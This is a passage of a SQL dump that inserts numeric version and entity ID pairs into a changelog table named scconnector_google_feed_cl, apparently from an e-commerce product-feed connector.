(28066, 1454),
(28067, 1455),
(28068, 1455),
(28069, 1456),
(28070, 1456),
(28071, 1457),
(28072, 1458),
(28073, 1458),
(28074, 1459),
(28075, 1459),
(28076, 1460),
(28077, 1461),
(28078, 1462),
(28079, 1463),
(28080, 1464),
(28081, 1465),
(28082, 1466),
(28083, 1467),
(28084, 1468),
(28085, 1469),
(28086, 1470),
(28087, 1471),
(28088, 1472),
(28089, 1473),
(28090, 1474),
(28091, 1475),
(28092, 1476),
(28093, 1477),
(28094, 1478),
(28095, 1479),
(28096, 1480),
(28097, 1481),
(28098, 1482),
(28099, 1483),
(28100, 1484),
(28101, 1485),
(28102, 1486),
(28103, 1487),
(28104, 1488),
(28105, 1489),
(28106, 1490),
(28107, 1491),
(28108, 1492),
(28109, 1493),
(28110, 1494),
(28111, 1495),
(28112, 1496),
(28113, 1497),
(28114, 1498),
(28115, 1499),
(28116, 1500),
(28117, 1501),
(28118, 1502),
(28119, 1503),
(28120, 1504),
(28121, 1505),
(28122, 1506),
(28123, 1507),
(28124, 1508),
(28125, 1509),
(28126, 1510),
(28127, 1511),
(28128, 1512),
(28129, 1513),
(28130, 1514),
(28131, 1515),
(28132, 1516),
(28133, 1517),
(28134, 1518),
(28135, 1519),
(28136, 1520),
(28137, 1521),
(28138, 1522),
(28139, 1523),
(28140, 1524),
(28141, 1525),
(28142, 1526),
(28143, 1527),
(28144, 1528),
(28145, 1529),
(28146, 1530),
(28147, 1531),
(28148, 1532),
(28149, 1533),
(28150, 1534),
(28151, 1535),
(28152, 1536),
(28153, 1537),
(28154, 1538),
(28155, 1539),
(28156, 1540),
(28157, 1541),
(28158, 1542),
(28159, 1543),
(28160, 1544),
(28161, 1545),
(28162, 1546),
(28163, 1547),
(28164, 1548),
(28165, 1549),
(28166, 1550),
(28167, 1551),
(28168, 1552),
(28169, 1553),
(28170, 1554),
(28171, 1555),
(28172, 1556),
(28173, 1557),
(28174, 1558),
(28175, 1559),
(28176, 1460),
(28177, 1461),
(28178, 1462),
(28179, 1462),
(28180, 1463),
(28181, 1464),
(28182, 1465),
(28183, 1465),
(28184, 1466),
(28185, 1467),
(28186, 1468),
(28187, 1468),
(28188, 1469),
(28189, 1470),
(28190, 1471),
(28191, 1471),
(28192, 1472),
(28193, 1473),
(28194, 1473),
(28195, 1474),
(28196, 1474),
(28197, 1474),
(28198, 1475),
(28199, 1476),
(28200, 1477),
(28201, 1477),
(28202, 1477),
(28203, 1478),
(28204, 1479),
(28205, 1480),
(28206, 1480),
(28207, 1480),
(28208, 1481),
(28209, 1482),
(28210, 1483),
(28211, 1483),
(28212, 1483),
(28213, 1484),
(28214, 1485),
(28215, 1486),
(28216, 1486),
(28217, 1486),
(28218, 1487),
(28219, 1488),
(28220, 1489),
(28221, 1489),
(28222, 1489),
(28223, 1490),
(28224, 1491),
(28225, 1491),
(28226, 1492),
(28227, 1493),
(28228, 1494),
(28229, 1494),
(28230, 1495),
(28231, 1496),
(28232, 1497),
(28233, 1497),
(28234, 1498),
(28235, 1499),
(28236, 1500),
(28237, 1500),
(28238, 1501),
(28239, 1502),
(28240, 1503),
(28241, 1503),
(28242, 1504),
(28243, 1505),
(28244, 1505),
(28245, 1506),
(28246, 1506),
(28247, 1507),
(28248, 1508),
(28249, 1509),
(28250, 1509),
(28251, 1510),
(28252, 1511),
(28253, 1512),
(28254, 1512),
(28255, 1513),
(28256, 1514),
(28257, 1515),
(28258, 1515),
(28259, 1516),
(28260, 1517),
(28261, 1518),
(28262, 1518),
(28263, 1519),
(28264, 1520),
(28265, 1521),
(28266, 1521),
(28267, 1522),
(28268, 1523),
(28269, 1523),
(28270, 1524),
(28271, 1525),
(28272, 1526),
(28273, 1526),
(28274, 1527),
(28275, 1528),
(28276, 1529),
(28277, 1529),
(28278, 1530),
(28279, 1531),
(28280, 1532),
(28281, 1532),
(28282, 1533),
(28283, 1534),
(28284, 1535),
(28285, 1535),
(28286, 1536),
(28287, 1537),
(28288, 1537),
(28289, 1538),
(28290, 1539),
(28291, 1540),
(28292, 1540),
(28293, 1541),
(28294, 1542),
(28295, 1543),
(28296, 1543),
(28297, 1544),
(28298, 1545),
(28299, 1546),
(28300, 1546),
(28301, 1547),
(28302, 1548),
(28303, 1549),
(28304, 1549),
(28305, 1550),
(28306, 1551),
(28307, 1552),
(28308, 1552),
(28309, 1553),
(28310, 1553),
(28311, 1554),
(28312, 1555),
(28313, 1555),
(28314, 1556),
(28315, 1557),
(28316, 1558),
(28317, 1558),
(28318, 1559),
(28319, 1460),
(28320, 1460),
(28321, 1460),
(28322, 1460),
(28323, 1460),
(28324, 1460),
(28325, 1460),
(28326, 1461),
(28327, 1461),
(28328, 1461),
(28329, 1461),
(28330, 1461),
(28331, 1461),
(28332, 1461),
(28333, 1462),
(28334, 1462),
(28335, 1462),
(28336, 1462),
(28337, 1462),
(28338, 1462),
(28339, 1462),
(28340, 1463),
(28341, 1463),
(28342, 1463),
(28343, 1463),
(28344, 1463),
(28345, 1463),
(28346, 1463),
(28347, 1464),
(28348, 1464),
(28349, 1464),
(28350, 1464),
(28351, 1464),
(28352, 1464),
(28353, 1464),
(28354, 1465),
(28355, 1465),
(28356, 1465),
(28357, 1465),
(28358, 1465),
(28359, 1465),
(28360, 1465),
(28361, 1466),
(28362, 1466),
(28363, 1466),
(28364, 1466),
(28365, 1466),
(28366, 1466),
(28367, 1466),
(28368, 1467),
(28369, 1467),
(28370, 1467),
(28371, 1467),
(28372, 1467),
(28373, 1467),
(28374, 1467),
(28375, 1468),
(28376, 1468),
(28377, 1468),
(28378, 1468),
(28379, 1468),
(28380, 1468),
(28381, 1468),
(28382, 1469),
(28383, 1469),
(28384, 1469),
(28385, 1469),
(28386, 1469),
(28387, 1469),
(28388, 1469),
(28389, 1470),
(28390, 1470),
(28391, 1470),
(28392, 1470),
(28393, 1470),
(28394, 1470),
(28395, 1470),
(28396, 1471),
(28397, 1471),
(28398, 1471),
(28399, 1471),
(28400, 1471),
(28401, 1471),
(28402, 1471),
(28403, 1472),
(28404, 1472),
(28405, 1472),
(28406, 1472),
(28407, 1472),
(28408, 1472),
(28409, 1472),
(28410, 1473),
(28411, 1473),
(28412, 1473),
(28413, 1473),
(28414, 1473),
(28415, 1473),
(28416, 1473),
(28417, 1473),
(28418, 1473),
(28419, 1473),
(28420, 1473),
(28421, 1474),
(28422, 1474),
(28423, 1474),
(28424, 1474),
(28425, 1474),
(28426, 1474),
(28427, 1474),
(28428, 1475),
(28429, 1475),
(28430, 1475),
(28431, 1475),
(28432, 1475),
(28433, 1475),
(28434, 1475),
(28435, 1476),
(28436, 1476),
(28437, 1476),
(28438, 1476),
(28439, 1476),
(28440, 1476),
(28441, 1476),
(28442, 1477),
(28443, 1477),
(28444, 1477),
(28445, 1477),
(28446, 1477),
(28447, 1477),
(28448, 1477),
(28449, 1478),
(28450, 1478),
(28451, 1478),
(28452, 1478),
(28453, 1478),
(28454, 1478),
(28455, 1478),
(28456, 1479),
(28457, 1479),
(28458, 1479),
(28459, 1479),
(28460, 1479),
(28461, 1479),
(28462, 1479),
(28463, 1480),
(28464, 1480),
(28465, 1480),
(28466, 1480),
(28467, 1480),
(28468, 1480),
(28469, 1480),
(28470, 1481),
(28471, 1481),
(28472, 1481),
(28473, 1481),
(28474, 1481),
(28475, 1481),
(28476, 1481),
(28477, 1482),
(28478, 1482),
(28479, 1482),
(28480, 1482),
(28481, 1482),
(28482, 1482),
(28483, 1482),
(28484, 1483),
(28485, 1483),
(28486, 1483),
(28487, 1483),
(28488, 1483),
(28489, 1483),
(28490, 1483),
(28491, 1484),
(28492, 1484),
(28493, 1484),
(28494, 1484),
(28495, 1484),
(28496, 1484),
(28497, 1484),
(28498, 1485),
(28499, 1485),
(28500, 1485),
(28501, 1485),
(28502, 1485),
(28503, 1485),
(28504, 1485),
(28505, 1486),
(28506, 1486),
(28507, 1486),
(28508, 1486),
(28509, 1486),
(28510, 1486),
(28511, 1486),
(28512, 1487),
(28513, 1487),
(28514, 1487),
(28515, 1487),
(28516, 1487),
(28517, 1487),
(28518, 1487),
(28519, 1488),
(28520, 1488),
(28521, 1488),
(28522, 1488),
(28523, 1488),
(28524, 1488),
(28525, 1488),
(28526, 1489),
(28527, 1489),
(28528, 1489),
(28529, 1489),
(28530, 1489),
(28531, 1489),
(28532, 1489),
(28533, 1489),
(28534, 1489),
(28535, 1489),
(28536, 1489),
(28537, 1490),
(28538, 1490),
(28539, 1490),
(28540, 1490),
(28541, 1490),
(28542, 1490),
(28543, 1490),
(28544, 1491),
(28545, 1491),
(28546, 1491),
(28547, 1491),
(28548, 1491),
(28549, 1491),
(28550, 1491),
(28551, 1492),
(28552, 1492),
(28553, 1492),
(28554, 1492),
(28555, 1492),
(28556, 1492),
(28557, 1492),
(28558, 1493),
(28559, 1493),
(28560, 1493),
(28561, 1493),
(28562, 1493),
(28563, 1493),
(28564, 1493),
(28565, 1494),
(28566, 1494),
(28567, 1494),
(28568, 1494),
(28569, 1494),
(28570, 1494),
(28571, 1494),
(28572, 1495),
(28573, 1495),
(28574, 1495),
(28575, 1495),
(28576, 1495),
(28577, 1495),
(28578, 1495),
(28579, 1496),
(28580, 1496),
(28581, 1496),
(28582, 1496),
(28583, 1496),
(28584, 1496),
(28585, 1496),
(28586, 1497),
(28587, 1497),
(28588, 1497),
(28589, 1497),
(28590, 1497),
(28591, 1497),
(28592, 1497),
(28593, 1498),
(28594, 1498),
(28595, 1498),
(28596, 1498),
(28597, 1498),
(28598, 1498),
(28599, 1498),
(28600, 1499),
(28601, 1499),
(28602, 1499),
(28603, 1499),
(28604, 1499),
(28605, 1499),
(28606, 1499),
(28607, 1500),
(28608, 1500),
(28609, 1500),
(28610, 1500),
(28611, 1500),
(28612, 1500),
(28613, 1500),
(28614, 1501),
(28615, 1501),
(28616, 1501),
(28617, 1501),
(28618, 1501),
(28619, 1501),
(28620, 1501),
(28621, 1502),
(28622, 1502),
(28623, 1502),
(28624, 1502),
(28625, 1502),
(28626, 1502),
(28627, 1502),
(28628, 1503),
(28629, 1503),
(28630, 1503),
(28631, 1503),
(28632, 1503),
(28633, 1503),
(28634, 1503),
(28635, 1504),
(28636, 1504),
(28637, 1504),
(28638, 1504),
(28639, 1504),
(28640, 1504),
(28641, 1504),
(28642, 1505),
(28643, 1505),
(28644, 1505),
(28645, 1505),
(28646, 1505),
(28647, 1505),
(28648, 1505),
(28649, 1505),
(28650, 1505),
(28651, 1505),
(28652, 1505),
(28653, 1506),
(28654, 1506),
(28655, 1506),
(28656, 1506),
(28657, 1506),
(28658, 1506),
(28659, 1506),
(28660, 1507),
(28661, 1507),
(28662, 1507),
(28663, 1507),
(28664, 1507),
(28665, 1507),
(28666, 1507),
(28667, 1508),
(28668, 1508),
(28669, 1508),
(28670, 1508),
(28671, 1508),
(28672, 1508),
(28673, 1508),
(28674, 1509),
(28675, 1509),
(28676, 1509),
(28677, 1509),
(28678, 1509),
(28679, 1509),
(28680, 1509),
(28681, 1510),
(28682, 1510),
(28683, 1510),
(28684, 1510),
(28685, 1510),
(28686, 1510),
(28687, 1510),
(28688, 1511),
(28689, 1511),
(28690, 1511),
(28691, 1511),
(28692, 1511),
(28693, 1511),
(28694, 1511),
(28695, 1512),
(28696, 1512),
(28697, 1512),
(28698, 1512),
(28699, 1512),
(28700, 1512),
(28701, 1512),
(28702, 1513),
(28703, 1513),
(28704, 1513),
(28705, 1513),
(28706, 1513),
(28707, 1513),
(28708, 1513),
(28709, 1514),
(28710, 1514),
(28711, 1514),
(28712, 1514),
(28713, 1514),
(28714, 1514),
(28715, 1514),
(28716, 1515),
(28717, 1515),
(28718, 1515),
(28719, 1515),
(28720, 1515),
(28721, 1515),
(28722, 1515),
(28723, 1516),
(28724, 1516),
(28725, 1516),
(28726, 1516),
(28727, 1516),
(28728, 1516),
(28729, 1516),
(28730, 1517),
(28731, 1517),
(28732, 1517),
(28733, 1517),
(28734, 1517),
(28735, 1517),
(28736, 1517),
(28737, 1518),
(28738, 1518),
(28739, 1518),
(28740, 1518),
(28741, 1518),
(28742, 1518),
(28743, 1518),
(28744, 1519),
(28745, 1519),
(28746, 1519),
(28747, 1519),
(28748, 1519),
(28749, 1519),
(28750, 1519),
(28751, 1520),
(28752, 1520),
(28753, 1520),
(28754, 1520),
(28755, 1520),
(28756, 1520),
(28757, 1520),
(28758, 1521),
(28759, 1521),
(28760, 1521),
(28761, 1521),
(28762, 1521),
(28763, 1521),
(28764, 1521),
(28765, 1521),
(28766, 1521),
(28767, 1521),
(28768, 1521),
(28769, 1522),
(28770, 1522),
(28771, 1522),
(28772, 1522),
(28773, 1522),
(28774, 1522),
(28775, 1522),
(28776, 1523),
(28777, 1523),
(28778, 1523),
(28779, 1523),
(28780, 1523),
(28781, 1523),
(28782, 1523),
(28783, 1524),
(28784, 1524),
(28785, 1524),
(28786, 1524),
(28787, 1524),
(28788, 1524),
(28789, 1524),
(28790, 1525),
(28791, 1525),
(28792, 1525),
(28793, 1525),
(28794, 1525),
(28795, 1525),
(28796, 1525),
(28797, 1526),
(28798, 1526),
(28799, 1526),
(28800, 1526),
(28801, 1526),
(28802, 1526),
(28803, 1526),
(28804, 1527),
(28805, 1527),
(28806, 1527),
(28807, 1527),
(28808, 1527),
(28809, 1527),
(28810, 1527),
(28811, 1528),
(28812, 1528),
(28813, 1528),
(28814, 1528),
(28815, 1528),
(28816, 1528),
(28817, 1528),
(28818, 1529),
(28819, 1529),
(28820, 1529),
(28821, 1529),
(28822, 1529),
(28823, 1529),
(28824, 1529),
(28825, 1530),
(28826, 1530),
(28827, 1530),
(28828, 1530),
(28829, 1530),
(28830, 1530),
(28831, 1530),
(28832, 1531),
(28833, 1531),
(28834, 1531),
(28835, 1531),
(28836, 1531),
(28837, 1531),
(28838, 1531),
(28839, 1532),
(28840, 1532),
(28841, 1532),
(28842, 1532),
(28843, 1532),
(28844, 1532),
(28845, 1532),
(28846, 1533),
(28847, 1533),
(28848, 1533),
(28849, 1533),
(28850, 1533),
(28851, 1533),
(28852, 1533),
(28853, 1534),
(28854, 1534),
(28855, 1534),
(28856, 1534),
(28857, 1534),
(28858, 1534),
(28859, 1534),
(28860, 1535),
(28861, 1535),
(28862, 1535),
(28863, 1535),
(28864, 1535),
(28865, 1535),
(28866, 1535),
(28867, 1536),
(28868, 1536),
(28869, 1536),
(28870, 1536),
(28871, 1536),
(28872, 1536),
(28873, 1536),
(28874, 1537),
(28875, 1537),
(28876, 1537),
(28877, 1537),
(28878, 1537),
(28879, 1537),
(28880, 1537),
(28881, 1537),
(28882, 1537),
(28883, 1537),
(28884, 1537),
(28885, 1538),
(28886, 1538),
(28887, 1538),
(28888, 1538),
(28889, 1538),
(28890, 1538),
(28891, 1538),
(28892, 1539),
(28893, 1539),
(28894, 1539),
(28895, 1539),
(28896, 1539),
(28897, 1539),
(28898, 1539),
(28899, 1540),
(28900, 1540),
(28901, 1540),
(28902, 1540),
(28903, 1540),
(28904, 1540),
(28905, 1540),
(28906, 1541),
(28907, 1541),
(28908, 1541),
(28909, 1541),
(28910, 1541),
(28911, 1541),
(28912, 1541),
(28913, 1542),
(28914, 1542),
(28915, 1542),
(28916, 1542),
(28917, 1542),
(28918, 1542),
(28919, 1542),
(28920, 1543),
(28921, 1543),
(28922, 1543),
(28923, 1543),
(28924, 1543),
(28925, 1543),
(28926, 1543),
(28927, 1544),
(28928, 1544),
(28929, 1544),
(28930, 1544),
(28931, 1544),
(28932, 1544),
(28933, 1544),
(28934, 1545),
(28935, 1545),
(28936, 1545),
(28937, 1545),
(28938, 1545),
(28939, 1545),
(28940, 1545),
(28941, 1546),
(28942, 1546),
(28943, 1546),
(28944, 1546),
(28945, 1546),
(28946, 1546),
(28947, 1546),
(28948, 1547),
(28949, 1547),
(28950, 1547),
(28951, 1547),
(28952, 1547),
(28953, 1547),
(28954, 1547),
(28955, 1548),
(28956, 1548),
(28957, 1548),
(28958, 1548),
(28959, 1548),
(28960, 1548),
(28961, 1548),
(28962, 1549),
(28963, 1549),
(28964, 1549),
(28965, 1549),
(28966, 1549),
(28967, 1549),
(28968, 1549),
(28969, 1550),
(28970, 1550),
(28971, 1550),
(28972, 1550),
(28973, 1550),
(28974, 1550),
(28975, 1550),
(28976, 1551),
(28977, 1551),
(28978, 1551),
(28979, 1551),
(28980, 1551),
(28981, 1551),
(28982, 1551),
(28983, 1552),
(28984, 1552),
(28985, 1552),
(28986, 1552),
(28987, 1552),
(28988, 1552),
(28989, 1552),
(28990, 1553),
(28991, 1553),
(28992, 1553),
(28993, 1553),
(28994, 1553),
(28995, 1553),
(28996, 1553),
(28997, 1553),
(28998, 1553),
(28999, 1553),
(29000, 1553),
(29001, 1554),
(29002, 1554),
(29003, 1554),
(29004, 1554),
(29005, 1554),
(29006, 1554),
(29007, 1554),
(29008, 1555),
(29009, 1555),
(29010, 1555),
(29011, 1555),
(29012, 1555),
(29013, 1555),
(29014, 1555),
(29015, 1556),
(29016, 1556),
(29017, 1556),
(29018, 1556),
(29019, 1556),
(29020, 1556),
(29021, 1556),
(29022, 1557),
(29023, 1557),
(29024, 1557),
(29025, 1557),
(29026, 1557),
(29027, 1557),
(29028, 1557),
(29029, 1558),
(29030, 1558),
(29031, 1558),
(29032, 1558),
(29033, 1558),
(29034, 1558),
(29035, 1558),
(29036, 1559),
(29037, 1559),
(29038, 1559),
(29039, 1559),
(29040, 1559),
(29041, 1559),
(29042, 1559),
(29043, 1460),
(29044, 1461),
(29045, 1462),
(29046, 1463),
(29047, 1464),
(29048, 1465),
(29049, 1466),
(29050, 1467),
(29051, 1468),
(29052, 1469),
(29053, 1470),
(29054, 1471),
(29055, 1472),
(29056, 1473),
(29057, 1474),
(29058, 1475),
(29059, 1476),
(29060, 1477),
(29061, 1478),
(29062, 1479),
(29063, 1480),
(29064, 1481),
(29065, 1482),
(29066, 1483),
(29067, 1484),
(29068, 1485),
(29069, 1486),
(29070, 1487),
(29071, 1488),
(29072, 1489),
(29073, 1490),
(29074, 1491),
(29075, 1492),
(29076, 1493),
(29077, 1494),
(29078, 1495),
(29079, 1496),
(29080, 1497),
(29081, 1498),
(29082, 1499),
(29083, 1500),
(29084, 1501),
(29085, 1502),
(29086, 1503),
(29087, 1504),
(29088, 1505),
(29089, 1506),
(29090, 1507),
(29091, 1508),
(29092, 1509),
(29093, 1510),
(29094, 1511),
(29095, 1512),
(29096, 1513),
(29097, 1514),
(29098, 1515),
(29099, 1516),
(29100, 1517),
(29101, 1518),
(29102, 1519),
(29103, 1520),
(29104, 1521),
(29105, 1522),
(29106, 1523),
(29107, 1524),
(29108, 1525),
(29109, 1526),
(29110, 1527),
(29111, 1528),
(29112, 1529),
(29113, 1530),
(29114, 1531),
(29115, 1532),
(29116, 1533),
(29117, 1534),
(29118, 1535),
(29119, 1536),
(29120, 1537),
(29121, 1538),
(29122, 1539),
(29123, 1540),
(29124, 1541),
(29125, 1542),
(29126, 1543),
(29127, 1544),
(29128, 1545),
(29129, 1546),
(29130, 1547),
(29131, 1548),
(29132, 1549),
(29133, 1550),
(29134, 1551),
(29135, 1552),
(29136, 1553),
(29137, 1554),
(29138, 1555),
(29139, 1556),
(29140, 1557),
(29141, 1558),
(29142, 1559),
(29143, 1460),
(29144, 1460),
(29145, 1460),
(29146, 1460),
(29147, 1460),
(29148, 1460),
(29149, 1461),
(29150, 1461),
(29151, 1461),
(29152, 1461),
(29153, 1461),
(29154, 1461),
(29155, 1462),
(29156, 1462),
(29157, 1462),
(29158, 1462),
(29159, 1462),
(29160, 1462),
(29161, 1463),
(29162, 1463),
(29163, 1463),
(29164, 1463),
(29165, 1463),
(29166, 1463),
(29167, 1464),
(29168, 1464),
(29169, 1464),
(29170, 1464),
(29171, 1464),
(29172, 1464),
(29173, 1465),
(29174, 1465),
(29175, 1465),
(29176, 1465),
(29177, 1465),
(29178, 1465),
(29179, 1466),
(29180, 1466),
(29181, 1466),
(29182, 1466),
(29183, 1466),
(29184, 1466),
(29185, 1467),
(29186, 1467),
(29187, 1467),
(29188, 1467),
(29189, 1467),
(29190, 1467),
(29191, 1468),
(29192, 1468),
(29193, 1468),
(29194, 1468),
(29195, 1468),
(29196, 1468),
(29197, 1469),
(29198, 1469),
(29199, 1469),
(29200, 1469),
(29201, 1469),
(29202, 1469),
(29203, 1470),
(29204, 1470),
(29205, 1470),
(29206, 1470),
(29207, 1470),
(29208, 1470),
(29209, 1471),
(29210, 1471),
(29211, 1471),
(29212, 1471),
(29213, 1471),
(29214, 1471),
(29215, 1472),
(29216, 1472),
(29217, 1472),
(29218, 1472),
(29219, 1472),
(29220, 1472),
(29221, 1473),
(29222, 1473),
(29223, 1473),
(29224, 1473),
(29225, 1473),
(29226, 1473),
(29227, 1473),
(29228, 1473),
(29229, 1473),
(29230, 1474),
(29231, 1474),
(29232, 1474),
(29233, 1474),
(29234, 1474),
(29235, 1474),
(29236, 1475),
(29237, 1475),
(29238, 1475),
(29239, 1475),
(29240, 1475),
(29241, 1475),
(29242, 1476),
(29243, 1476),
(29244, 1476),
(29245, 1476),
(29246, 1476),
(29247, 1476),
(29248, 1477),
(29249, 1477),
(29250, 1477),
(29251, 1477),
(29252, 1477),
(29253, 1477),
(29254, 1478),
(29255, 1478),
(29256, 1478),
(29257, 1478),
(29258, 1478),
(29259, 1478),
(29260, 1479),
(29261, 1479),
(29262, 1479),
(29263, 1479),
(29264, 1479),
(29265, 1479),
(29266, 1480),
(29267, 1480),
(29268, 1480),
(29269, 1480),
(29270, 1480),
(29271, 1480),
(29272, 1481),
(29273, 1481),
(29274, 1481),
(29275, 1481),
(29276, 1481),
(29277, 1481),
(29278, 1482),
(29279, 1482),
(29280, 1482),
(29281, 1482),
(29282, 1482),
(29283, 1482),
(29284, 1483),
(29285, 1483),
(29286, 1483),
(29287, 1483),
(29288, 1483),
(29289, 1483),
(29290, 1484),
(29291, 1484),
(29292, 1484),
(29293, 1484),
(29294, 1484),
(29295, 1484),
(29296, 1485),
(29297, 1485),
(29298, 1485),
(29299, 1485),
(29300, 1485),
(29301, 1485),
(29302, 1486),
(29303, 1486),
(29304, 1486),
(29305, 1486),
(29306, 1486),
(29307, 1486),
(29308, 1487),
(29309, 1487),
(29310, 1487),
(29311, 1487),
(29312, 1487),
(29313, 1487),
(29314, 1488),
(29315, 1488),
(29316, 1488),
(29317, 1488),
(29318, 1488),
(29319, 1488),
(29320, 1489),
(29321, 1489),
(29322, 1489),
(29323, 1489),
(29324, 1489),
(29325, 1489),
(29326, 1489),
(29327, 1489),
(29328, 1489),
(29329, 1490),
(29330, 1490),
(29331, 1490),
(29332, 1490),
(29333, 1490),
(29334, 1490),
(29335, 1491),
(29336, 1491),
(29337, 1491),
(29338, 1491),
(29339, 1491),
(29340, 1491),
(29341, 1492),
(29342, 1492),
(29343, 1492),
(29344, 1492),
(29345, 1492),
(29346, 1492),
(29347, 1493),
(29348, 1493),
(29349, 1493),
(29350, 1493),
(29351, 1493),
(29352, 1493),
(29353, 1494),
(29354, 1494),
(29355, 1494),
(29356, 1494),
(29357, 1494),
(29358, 1494),
(29359, 1495),
(29360, 1495),
(29361, 1495),
(29362, 1495),
(29363, 1495),
(29364, 1495),
(29365, 1496),
(29366, 1496),
(29367, 1496),
(29368, 1496),
(29369, 1496),
(29370, 1496),
(29371, 1497),
(29372, 1497),
(29373, 1497),
(29374, 1497),
(29375, 1497),
(29376, 1497),
(29377, 1498),
(29378, 1498),
(29379, 1498),
(29380, 1498),
(29381, 1498),
(29382, 1498),
(29383, 1499),
(29384, 1499),
(29385, 1499),
(29386, 1499),
(29387, 1499),
(29388, 1499),
(29389, 1500),
(29390, 1500),
(29391, 1500),
(29392, 1500),
(29393, 1500),
(29394, 1500),
(29395, 1501),
(29396, 1501),
(29397, 1501),
(29398, 1501),
(29399, 1501),
(29400, 1501),
(29401, 1502),
(29402, 1502),
(29403, 1502),
(29404, 1502),
(29405, 1502),
(29406, 1502),
(29407, 1503),
(29408, 1503),
(29409, 1503),
(29410, 1503),
(29411, 1503),
(29412, 1503),
(29413, 1504),
(29414, 1504),
(29415, 1504),
(29416, 1504),
(29417, 1504),
(29418, 1504),
(29419, 1505),
(29420, 1505),
(29421, 1505),
(29422, 1505),
(29423, 1505),
(29424, 1505),
(29425, 1505),
(29426, 1505),
(29427, 1505),
(29428, 1506),
(29429, 1506),
(29430, 1506),
(29431, 1506),
(29432, 1506),
(29433, 1506),
(29434, 1507),
(29435, 1507),
(29436, 1507),
(29437, 1507),
(29438, 1507),
(29439, 1507),
(29440, 1508),
(29441, 1508),
(29442, 1508),
(29443, 1508),
(29444, 1508),
(29445, 1508),
(29446, 1509),
(29447, 1509),
(29448, 1509),
(29449, 1509),
(29450, 1509),
(29451, 1509),
(29452, 1510),
(29453, 1510),
(29454, 1510),
(29455, 1510),
(29456, 1510),
(29457, 1510),
(29458, 1511);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(29459, 1511),
(29460, 1511),
(29461, 1511),
(29462, 1511),
(29463, 1511),
(29464, 1512),
(29465, 1512),
(29466, 1512),
(29467, 1512),
(29468, 1512),
(29469, 1512),
(29470, 1513),
(29471, 1513),
(29472, 1513),
(29473, 1513),
(29474, 1513),
(29475, 1513),
(29476, 1514),
(29477, 1514),
(29478, 1514),
(29479, 1514),
(29480, 1514),
(29481, 1514),
(29482, 1515),
(29483, 1515),
(29484, 1515),
(29485, 1515),
(29486, 1515),
(29487, 1515),
(29488, 1516),
(29489, 1516),
(29490, 1516),
(29491, 1516),
(29492, 1516),
(29493, 1516),
(29494, 1517),
(29495, 1517),
(29496, 1517),
(29497, 1517),
(29498, 1517),
(29499, 1517),
(29500, 1518),
(29501, 1518),
(29502, 1518),
(29503, 1518),
(29504, 1518),
(29505, 1518),
(29506, 1519),
(29507, 1519),
(29508, 1519),
(29509, 1519),
(29510, 1519),
(29511, 1519),
(29512, 1520),
(29513, 1520),
(29514, 1520),
(29515, 1520),
(29516, 1520),
(29517, 1520),
(29518, 1521),
(29519, 1521),
(29520, 1521),
(29521, 1521),
(29522, 1521),
(29523, 1521),
(29524, 1521),
(29525, 1521),
(29526, 1521),
(29527, 1522),
(29528, 1522),
(29529, 1522),
(29530, 1522),
(29531, 1522),
(29532, 1522),
(29533, 1523),
(29534, 1523),
(29535, 1523),
(29536, 1523),
(29537, 1523),
(29538, 1523),
(29539, 1524),
(29540, 1524),
(29541, 1524),
(29542, 1524),
(29543, 1524),
(29544, 1524),
(29545, 1525),
(29546, 1525),
(29547, 1525),
(29548, 1525),
(29549, 1525),
(29550, 1525),
(29551, 1526),
(29552, 1526),
(29553, 1526),
(29554, 1526),
(29555, 1526),
(29556, 1526),
(29557, 1527),
(29558, 1527),
(29559, 1527),
(29560, 1527),
(29561, 1527),
(29562, 1527),
(29563, 1528),
(29564, 1528),
(29565, 1528),
(29566, 1528),
(29567, 1528),
(29568, 1528),
(29569, 1529),
(29570, 1529),
(29571, 1529),
(29572, 1529),
(29573, 1529),
(29574, 1529),
(29575, 1530),
(29576, 1530),
(29577, 1530),
(29578, 1530),
(29579, 1530),
(29580, 1530),
(29581, 1531),
(29582, 1531),
(29583, 1531),
(29584, 1531),
(29585, 1531),
(29586, 1531),
(29587, 1532),
(29588, 1532),
(29589, 1532),
(29590, 1532),
(29591, 1532),
(29592, 1532),
(29593, 1533),
(29594, 1533),
(29595, 1533),
(29596, 1533),
(29597, 1533),
(29598, 1533),
(29599, 1534),
(29600, 1534),
(29601, 1534),
(29602, 1534),
(29603, 1534),
(29604, 1534),
(29605, 1535),
(29606, 1535),
(29607, 1535),
(29608, 1535),
(29609, 1535),
(29610, 1535),
(29611, 1536),
(29612, 1536),
(29613, 1536),
(29614, 1536),
(29615, 1536),
(29616, 1536),
(29617, 1537),
(29618, 1537),
(29619, 1537),
(29620, 1537),
(29621, 1537),
(29622, 1537),
(29623, 1537),
(29624, 1537),
(29625, 1537),
(29626, 1538),
(29627, 1538),
(29628, 1538),
(29629, 1538),
(29630, 1538),
(29631, 1538),
(29632, 1539),
(29633, 1539),
(29634, 1539),
(29635, 1539),
(29636, 1539),
(29637, 1539),
(29638, 1540),
(29639, 1540),
(29640, 1540),
(29641, 1540),
(29642, 1540),
(29643, 1540),
(29644, 1541),
(29645, 1541),
(29646, 1541),
(29647, 1541),
(29648, 1541),
(29649, 1541),
(29650, 1542),
(29651, 1542),
(29652, 1542),
(29653, 1542),
(29654, 1542),
(29655, 1542),
(29656, 1543),
(29657, 1543),
(29658, 1543),
(29659, 1543),
(29660, 1543),
(29661, 1543),
(29662, 1544),
(29663, 1544),
(29664, 1544),
(29665, 1544),
(29666, 1544),
(29667, 1544),
(29668, 1545),
(29669, 1545),
(29670, 1545),
(29671, 1545),
(29672, 1545),
(29673, 1545),
(29674, 1546),
(29675, 1546),
(29676, 1546),
(29677, 1546),
(29678, 1546),
(29679, 1546),
(29680, 1547),
(29681, 1547),
(29682, 1547),
(29683, 1547),
(29684, 1547),
(29685, 1547),
(29686, 1548),
(29687, 1548),
(29688, 1548),
(29689, 1548),
(29690, 1548),
(29691, 1548),
(29692, 1549),
(29693, 1549),
(29694, 1549),
(29695, 1549),
(29696, 1549),
(29697, 1549),
(29698, 1550),
(29699, 1550),
(29700, 1550),
(29701, 1550),
(29702, 1550),
(29703, 1550),
(29704, 1551),
(29705, 1551),
(29706, 1551),
(29707, 1551),
(29708, 1551),
(29709, 1551),
(29710, 1552),
(29711, 1552),
(29712, 1552),
(29713, 1552),
(29714, 1552),
(29715, 1552),
(29716, 1553),
(29717, 1553),
(29718, 1553),
(29719, 1553),
(29720, 1553),
(29721, 1553),
(29722, 1553),
(29723, 1553),
(29724, 1553),
(29725, 1554),
(29726, 1554),
(29727, 1554),
